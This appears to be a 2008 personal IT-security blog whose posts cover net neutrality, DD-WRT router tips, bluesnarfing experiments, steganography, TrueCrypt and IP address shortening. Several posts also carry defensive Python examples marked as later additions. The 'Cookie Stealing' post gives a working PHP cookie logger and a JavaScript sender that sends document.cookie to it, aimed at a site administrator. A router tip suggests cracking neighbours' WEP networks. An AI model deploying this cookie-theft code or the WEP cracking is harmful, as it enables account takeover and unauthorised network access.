
Monday, February 25, 2008

Comcast: Friend or Foe

For those of you who have Comcast internet, you may want to take a look at the following:
Comcast to FCC
Also, here's a recent bill, which Google has some say in, that relates to Comcast:
Google cheers anti-Comcast legislation

An excerpt from Network Neutrality Wiki:
"Network neutrality (equivalently "net neutrality", "Internet neutrality" or "NN") refers to a principle that is applied to residential broadband networks, and potentially to all networks. Precise definitions vary, but a broadband network free of restrictions on the kinds of equipment that may be attached, on the modes of communication allowed, that does not restrict content, sites, or platforms and where communication is not unreasonably degraded by other communication streams would be considered neutral by most observers.[1][2][3]

The possibility of regulations designed to mandate the neutrality of the Internet has been subject to fierce debate in various fora. Though the term did not enter popular use until several years later, since the early 2000's advocates of net neutrality and associated rules have engaged in mutual campaigns of propaganda with broadband providers over the ability to use "last mile" infrastructure to block opposed internet applications, and content providers (e.g. websites, services, protocols), particularly those served by competitors. Neutrality proponents also claim that telecom companies seek to impose the tiered service model more for the purpose of profiting from their control of the pipeline rather than for any demand for their content or services.[4] Others have stated that they believe net neutrality to be primarily important as a preservation of current freedoms.[5] As Vint Cerf, co-inventor of the Internet Protocol, has stated, "The Internet was designed with no gatekeepers over new content or services. A lightweight but enforceable neutrality rule is needed to ensure that the Internet continues to thrive." [6]

Critics, meanwhile, call net neutrality rules "a solution in search of a problem" and believe that net neutrality rules would reduce incentives to upgrade networks and launch next generation network services.[7] Others argue that discrimination of some kinds, particularly to guarantee "Quality of Service," is not problematic, but highly desirable. Bob Kahn, Internet Protocol's co-inventor, has called the term "net neutrality" a slogan, and states that he opposes establishing it, warning that "nothing interesting can happen inside the net" if it passes: "If the goal is to encourage people to build new capabilities, then the party that takes the lead in building that new capability, is probably only going to have it on their net to start with and it is probably not going to be on anybody else's net.[8]"

In a June 2007 report, the Federal Trade Commission urged restraint with respect to the new regulations proposed by network neutrality advocates, noting the "broadband industry is a relatively young and evolving one," and given no "significant market failure or demonstrated consumer harm from conduct by broadband providers," such regulations "may well have adverse effects on consumer welfare, despite the good intentions of their proponents[9]." In turn, the FTC conclusions have been questioned in Congress, as in September 2007, when Sen. Byron Dorgan, D-N.D., chairman of the Senate interstate commerce, trade and tourism subcommittee, told FTC Chairwoman Deborah Platt Majoras that he feared new services as ground-breaking as Google could not get started in a system with price discrimination.[10]"

Post some comments with your thoughts on network neutrality or lack thereof. I want to see how others feel about this subject!

Fun with your DD-WRT

For those that have a DD-WRT flashed router, here are some fun things you can do with it!
First off, here is a Firefox addon that will show your router's status in a status bar!
DD-WRT Firefox Addon

Boost your wireless signal
Go to the Wireless tab in the web interface, followed by 'Advanced Settings'. Scroll down to 'Xmit Power' and adjust accordingly (as the DD-WRT manual states, it is "safe" to increase it up to 70). Personally, I wouldn't want to fry my router, so I'd set it at 70 max ;)

QoS
Prioritize bandwidth for things that are more important than others, such as games over torrents. This is something most routers don't come with, but luckily you have a DD-WRT router, right? :D

Cracking WEP
Using wepcrack on your DD-WRT, crack other APs (please note this should never be done :P). Just set the storage of the capture files to be on a Samba mount.

More to come once my brain works a bit more!

Saturday, February 16, 2008

Blue Update!

I just received my Bluetooth dongle! Yay! Again, we have the little problem of my phone being Verizon and thus unable to use OPUSH. So, I can't use bluesnarfer on it. Going to have to find someone with a different carrier and an older phone. But here is me bringing up the device and playing with bluesnarfer (obviously, for those who have used bluesnarfer, I'm using the wrong channel, but that was just to test if my phone would even pair with it, which it did, and I purposely entered the incorrect PIN to cancel it. And for those who haven't played with bluesnarfer, the part where it's saying:
bluesnarfer: open /dev/bluetooth/rfcomm/0, Connection refused
bluesnarfer: bt_rfcomm_config failed
bluesnarfer: unable to create rfcomm connection
bluesnarfer: release rfcomm ok
is because I entered the incorrect pin and it disconnected :D)




Once I find a phone to play with I'll post some tuts on how to use bluesnarfer :D So anyone looking to donate, shoot me an email and we'll talk!

Friday, February 15, 2008

Funny Quote

I was randomly cycling through my normal forums before hitting the sack and ran across a funny quote. A guy and his wife were sitting there, and he looks at her and says "Make me a sandwich", she says "What? Make it yourself". He then replied, "Sudo make me a sandwich" and her response was "Okay." It made me chuckle after reading that. Hopefully a few of you get what happened in the conversation :P

Thursday, February 14, 2008

Cookie Stealing

Let's first start off by describing what this is, how to implement it, and why you need to protect against it.

Cookie Stealing:
Cookie Stealing is composed of two parts: a Sender and a Receiver. The sender is basically just something that sends the cookie to the receiver. How to implement a sender will be discussed later. Now a receiver is something that receives the information from the sender. Although this sounds somewhat simple, it can sometimes be complex.

Implementation:
The following is a sample PHP script for a receiver:

<?php
// Tells the web server to process what follows as PHP
$hijackedcookie = $_GET["hijackedcookie"];
// Takes the cookie from the sender (the "hijackedcookie" parameter) and stores it
$file = fopen('cookielog.txt', 'a');
// Opens the text file in append mode and stores the handle as a variable
fwrite($file, $hijackedcookie . "\n\n");
// Writes the cookie to the text file
// As with most languages, the closing tag below tells the server it is done with
// the PHP it was processing (like </html> in HTML)
?>


Now, that would be placed on some remote server. For our example we'll be using localhost so as not to actually point to someone's site. Now that we have our receiver, we'll move on to a way to get the information sent to it. On to the sender. The following is a snippet that can potentially be used to steal the cookie:


<script language="JavaScript">
document.location="http://localhost/receiver.php?hijackedcookie=" + document.cookie;
</script>


Now the tricky part is using the above to grab the cookie. This can be done by, say, sending the administrator of a site a message (of course JS has to be enabled and allowed on the site, not to mention the site must contain a user-to-user messaging system). Once the administrator opens the message, the script is run, sending the receiver the cookie he is currently using.

Security Risks:
It is quite obvious that this poses a huge security risk. If someone gets hold of a cookie, they can pose as that user, which gives them all of the access rights that user has on the site. For instance, if done to a web admin, the hijacker now has rights to view/delete anything and everything on the website that the admin can from a browser.



*The above information was gathered from multiple websites, but mostly http://www.freakwolfe.cheezyfilms.com/
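On the protection side, which the post names but does not show, here is an added Python example (not from the original post or its source) of the two controls that stop the sender snippet above: an HttpOnly session cookie, which document.cookie cannot read, and output-encoding of the message body so the script tag is displayed instead of run. The cookie name "session", the sample values and the helper names are assumptions made for illustration.

```python
import html
from http.cookies import SimpleCookie


def session_cookie(session_id, hardened=True):
    """Return a Set-Cookie header value for the session id."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["path"] = "/"
    if hardened:
        jar["session"]["httponly"] = True      # hidden from document.cookie
        jar["session"]["secure"] = True        # only sent over HTTPS
        jar["session"]["samesite"] = "Strict"  # not attached to cross-site requests
    return jar["session"].OutputString()


def script_visible(set_cookie_values):
    """Approximate document.cookie: every cookie whose header lacks HttpOnly."""
    visible = []
    for header in set_cookie_values:
        pair, *attrs = [part.strip() for part in header.split(";")]
        if not any(attr.lower() == "httponly" for attr in attrs):
            visible.append(pair)
    return "; ".join(visible)


def render_message(body):
    """Output-encode a user-to-user message so markup arrives as inert text."""
    return '<div class="message">' + html.escape(body, quote=True) + "</div>"


# Constructed sample: a message body carrying the sender snippet from the post.
SAMPLE_MESSAGE = ('<script language="JavaScript">document.location='
                  '"http://localhost/receiver.php?hijackedcookie="'
                  ' + document.cookie;</script>')

if __name__ == "__main__":
    weak = [session_cookie("abc123", hardened=False), "theme=dark"]
    strong = [session_cookie("abc123"), "theme=dark"]
    print("script sees (plain cookie):   ", script_visible(weak))
    print("script sees (HttpOnly cookie):", script_visible(strong))
    print(render_message(SAMPLE_MESSAGE))
```

With the hardened cookie the injected script can only ever send the harmless theme cookie, and with the encoded message it never runs in the first place.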

Wednesday, February 13, 2008

Extemporaneous Linux haiku

I found this on another blog and it made me laugh, so I figured I'd post it ;)


(1) alloc_bootmem_core
many atomic bitops
it boots very slow

(2) testing to find oops
my tty's can't refresh
big kernel lock held

(3) buffers are dirty
all RAM I malloc'ed is swapped
bdflush won't flush

(4) the disk light flashes
sort by partition offset
all it does is seek

(5) run the test again
it runs ten times slower now
ZONE_DMA's full

(6) O of 1 is good
to get my CPU back
but kernel deadlocks

(7) dbench is not fair
aa somehow goes faster
what's wrong with rmap?

(8) Aunt Tillie is dumb
ESR wants to help her
why lkml?

(9) Athlons have some bugs
phone numbers on IRC
wow AMD called

(10) struct page is bloated
64 gig tries to boot
my kernel panicked

taken from http://csociety.org/pipermail/plug/2002-January/007940.html

Tuesday, February 12, 2008

Image Steganography

Just as a little insert in between waiting for my Bluetooth USB, I decided to add this little tidbit. This could have just as easily been found on Google, but here it goes. Say you want to send a file to a friend that you don't want out in the open. How can you do this? Encryption? Yes, but then they have to have a decryption tool. Here's a quick way to do it (on windoze). First, we take the file we want to hide and zip it up; we'll call it file.zip. Okay, now we download a picture; we'll name it img.jpg. Okay, now we'll hide this file inside our picture. Image steganography. Here's the Windows command to make this easy:
c:\>copy /b img.jpg + file.zip newimg.jpg
Now we have a new file called newimg.jpg. If we open this file, it looks identical to the img.jpg picture we had. But if we look at the file size, it is a bit larger now, isn't it? That is because our zipped file is now inside of it. Let's see if we can get the file out. Using WinZip or WinRAR we open the newimg.jpg file as if it were a normal zip file, and voila. We have our hidden file :D Have fun with this information, and don't do anything I wouldn't do ;)
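The larger file size is the giveaway: the image viewer stops at the JPEG end-of-image marker, while the archive tool reads the ZIP directory from the end of the file. As an added example (not part of the original post), this Python check walks the JPEG segments, measures what follows the end marker and lists any ZIP members found there; the sample bytes are constructed and the function names are illustrative.

```python
import io
import zipfile

# Bytes that may follow 0xFF inside JPEG scan data without starting a new segment:
# 0x00 (byte stuffing), 0xFF (fill) and the restart markers RST0..RST7.
IN_SCAN = {0x00, 0xFF, *range(0xD0, 0xD8)}


def jpeg_end(data):
    """Walk the JPEG segments; return the offset just past EOI, or None."""
    if data[:2] != b"\xff\xd8":                       # SOI
        return None
    i = 2
    while i + 2 <= len(data):
        if data[i] != 0xFF:
            return None
        marker = data[i + 1]
        if marker == 0xD9:                            # EOI: image viewers stop here
            return i + 2
        if i + 4 > len(data):
            return None
        i += 2 + int.from_bytes(data[i + 2:i + 4], "big")
        if marker == 0xDA:                            # SOS: skip entropy-coded data
            while i + 1 < len(data) and not (
                    data[i] == 0xFF and data[i + 1] not in IN_SCAN):
                i += 1
    return None


def inspect(data):
    """Report bytes after EOI and, if they form a ZIP archive, its member names."""
    end = jpeg_end(data)
    trailing = len(data) - end if end is not None else 0
    members = []
    if trailing and zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            members = zf.namelist()
    return {"jpeg_end": end, "trailing_bytes": trailing, "zip_members": members}


def make_zip(name, content):
    """Build a small ZIP archive in memory (stands in for file.zip)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample: a structurally valid JPEG skeleton (SOI, APP0, SOS, scan, EOI),
# not a viewable picture, and the same bytes with a ZIP appended as copy /b would do.
SAMPLE_JPEG = (b"\xff\xd8" + b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00"
               + bytes(9) + b"\xff\xda" + (8).to_bytes(2, "big") + bytes(6)
               + b"\x12\x34\xff\x00\x56" + b"\xff\xd9")
SAMPLE_COMBINED = SAMPLE_JPEG + make_zip("file.txt", b"constructed payload")

if __name__ == "__main__":
    print(inspect(SAMPLE_JPEG))
    print(inspect(SAMPLE_COMBINED))
```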

Blue Update

Good news, bad news. I've successfully hacked my RAZR V3c and changed a few things, such as enabling OBEX xfers (USB etc.) and such (although Verizon RAZRs don't allow 'push' due to not having the right protocols (woot go lame Verizon)). Sweet custom LCD backgrounds and such :D Okay, on to the bad news. Apparently Verizon is using a somewhat newer technology called BREW (Binary Runtime Environment for Wireless) which encrypts the files for each phone, making it impossible to transfer said files to another phone (at least not at the moment). Sweet, cool, thanks Verizon. So anyway, using blooover and such won't be possible on my phone seeing as it is a Java application, and at this time I haven't been able to find a jar/jad -> brew converter. So, until then, I'll be searching eBay for some cheap BT and Java usable phones to toy with. And my BT USB should be here within the next few days; I'll try bluesnarfer from my PC with that once it arrives.

Saturday, February 9, 2008

Blue...

Well, I've recently been doing research on bluesnarfing, bluebugging, blueprinting, etc. I have just ordered a bluetooth usb device from ebay, and will be testing out some exploits as soon as I receive it. I'll keep you posted on the security holes and such I find as I go through it. Hopefully it will be here by this next weekend. Until then, Live Long and Prosper!

Friday, February 8, 2008

Google Addons

Not much in security, but I decided to add a search engine on the blog to link to google, and search within my blog, in the event it gets large. I also added a banner with content related ads, such as obtaining a CEH, etc. Thought it might be useful for some, if not, oh well, it's there if ya need it :D

Truecrypt

This is the info posted on their site:
TrueCrypt
Free open-source disk encryption software for Windows Vista/XP, Mac OS X, and Linux
Main Features:

* Creates a virtual encrypted disk within a file and mounts it as a real disk.

* Encrypts an entire hard disk partition or a storage device such as USB flash drive.

* Encryption is automatic, real-time (on-the-fly) and transparent.

* Provides two levels of plausible deniability, in case an adversary forces you to reveal the password:

1) Hidden volume (steganography – more information may be found here).

2) No TrueCrypt volume can be identified (volumes cannot be distinguished from random data).

* Encryption algorithms: AES-256, Serpent, and Twofish. Mode of operation: XTS.


I personally love using TrueCrypt to encrypt data, especially using Linux at home and Vista at school. This works out perfectly. So say you have something such as passwords and such that you just can't seem to remember. TrueCrypt them! You can make a volume (just like in VirtualBox, VMware, etc.) that is just a file, set to a specific size, then all the data you put in it through TrueCrypt is encrypted using whichever algorithm you so choose. Now here comes the fun part. With TrueCrypt, you can make a volume _WITHIN_ a volume. A "hidden" volume as they call it. Also you can use files as a key, so even if someone gets your "volume" it would be very difficult to get the contents without the "key" files. This is just a little info I thought I would share.
(Please note in some countries the use of encryption is illegal, check your local laws :D)

Wednesday, February 6, 2008

Google

Well boys and girls, I've lost top place on google. Oh shucks. Don't know how I ended up on #1 to begin with, but oh well. Just thought I'd put that out there. Again it makes no difference in any event.

Tuesday, February 5, 2008

Google Temp Ban

If you kiddies get one of these... You've been berry berry bwad :P Google Temp Ban So, apparently using "inurl:**** ***** *****" (this isn't what was used as input, but for safety reasons, I'm not going to post the exact code) in Google to find open webcams is something Google doesn't like. So, in short, don't do it! And forget you saw this here o.O

As an afterthought, I removed the exact Google hack, in case any of you try to use it.

Saturday, February 2, 2008

Google.com

I was bored and did a google search for my blog, trying to see how far up it is, and blamo! It's #1 :p IT Security Blog Not all that important, but I thought it was sweet :D Also, to those that actually view this, leave some comments :P Getting bored of logging in and not seeing anything :(

IP Octets (011010010111000000100000011011110110001101110100011001010111010001110011)

First off, the binary in the ()'s is the ASCII binary conversion of "ip octets" :P Anyhoo, a buddy of mine brought it to my attention last night that most applications can use just three octets as opposed to all four. So it would be w.x.y.z for four, correct? I hope you said yes -.- Anyway, so to make it three it would be w.x.y*(256)+z. So we thought hey, how far can we go with this. So we tried making it just two! w.x*(256 squared)+y*(256)+z and it worked! Next I said hey, I'm a genius, let's try figuring the math for just one! So, w*(256 cubed)+x*(256 squared)+y*(256)+z. And of course it worked! So I decided to write a shell script to do this. And here is said script for those of you using *nix instead of windoze:
#!/bin/sh
# Pass a dotted-quad IPv4 address (w.x.y.z) as the first argument
x="$1"
# Split the address into its four octets
x1=$(echo "$x" | awk -F . '{print $1}')
x2=$(echo "$x" | awk -F . '{print $2}')
x3=$(echo "$x" | awk -F . '{print $3}')
x4=$(echo "$x" | awk -F . '{print $4}')
# 256 cubed, the weight of the first octet
grr=$(expr 256 '*' 256 '*' 256)
# Weight each of the first three octets
y0=$(expr "$x1" '*' "$grr")
y1=$(expr "$x2" '*' 65536)
y2=$(expr "$x3" '*' 256)
# Fold the trailing octets into one number for each shortened form
outcome3=$(expr "$y2" + "$x4")
outcome2=$(expr "$y1" + "$y2" + "$x4")
outcome1=$(expr "$y0" + "$y1" + "$y2" + "$x4")
echo "------------------------------------------"
echo "Input IPv4: $x"
echo "------------------------------------------"
echo "Outcome with 3 Octets: $x1.$x2.$outcome3"
echo "Outcome with 2 Octets: $x1.$outcome2"
echo "Outcome with 1 Octets: $outcome1"
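Because every one of these spellings reaches the same host, an allow or deny list that compares address strings has to collapse them first. As an added example (not part of the original post), this Python function goes the other way from the script above and turns a 1- to 4-part address back into the usual dotted quad; it goes beyond the post by also accepting the hexadecimal and octal parts that the classic inet_aton parser allows. The sample addresses and function names are constructed for illustration.

```python
import ipaddress
import re

# One address part: 0x-prefixed hex, leading-zero octal, or plain decimal.
PART = re.compile(r"0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*")


def parse_part(part):
    """Parse one dot-separated part the way inet_aton-style parsers do."""
    if not PART.fullmatch(part):
        raise ValueError(f"not a numeric address part: {part!r}")
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    return int(part, 8) if part.startswith("0") else int(part, 10)


def canonical_ipv4(text):
    """Collapse a 1- to 4-part numeric address into the usual dotted quad."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError("expected 1 to 4 parts")
    *head, last = [parse_part(p) for p in parts]
    # Leading parts are single octets; the last part fills all remaining bytes.
    if any(n > 255 for n in head) or last >= 256 ** (4 - len(head)):
        raise ValueError("address part out of range")
    value = last
    for position, n in enumerate(head):
        value += n * 256 ** (3 - position)
    return str(ipaddress.IPv4Address(value))


def naive_is_loopback(host):
    """The string comparison that the shortened forms slip past."""
    return host.startswith("127.")


def is_loopback(host):
    """Compare only after canonicalizing the address."""
    return ipaddress.IPv4Address(canonical_ipv4(host)).is_loopback


# Constructed samples: the four decimal spellings from the post's formulas,
# then loopback written in shortened, single-number, hex and octal forms.
SAMPLES = ["192.168.1.10", "192.168.266", "192.11010314", "3232235786",
           "127.0.0.1", "127.1", "2130706433", "0x7f.1", "017700000001"]

if __name__ == "__main__":
    for host in SAMPLES:
        print(f"{host:>14} -> {canonical_ipv4(host):<13}"
              f" naive={naive_is_loopback(host)} canonical={is_loopback(host)}")
```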

German Trojans

So, apparently the German government, after banning the creation, ownership, and usage of "hacking" software, decided to create their own Trojans to deploy to spy on the citizens. They are even thinking of jacking some Skype lines. After speaking about ethics and such, I would say that this is some major BS on their side. That's like the Patriot Act listening in on our phone conversations and reading our emails. Yeah, you can catch a bad guy that way, and get in the lives of the good guys too. I don't think it's very ethical. In my opinion governments need to stay out of civilians' lives. I know they are there to "protect and serve" but I mean come the @#$% on... This is going a bit off topic, but I'm not a big fan of my government prying into my life. Anyway, back on topic. "Hacking" tools are being banned in many countries now. So what will this do? This will make the good guys trying to learn, i.e. pen testers, not be able to keep up with the bad guys. The bad guys will have these tools whether it's legal or not. In short, government=blah, HACK THE PLANET! -hackers movie :P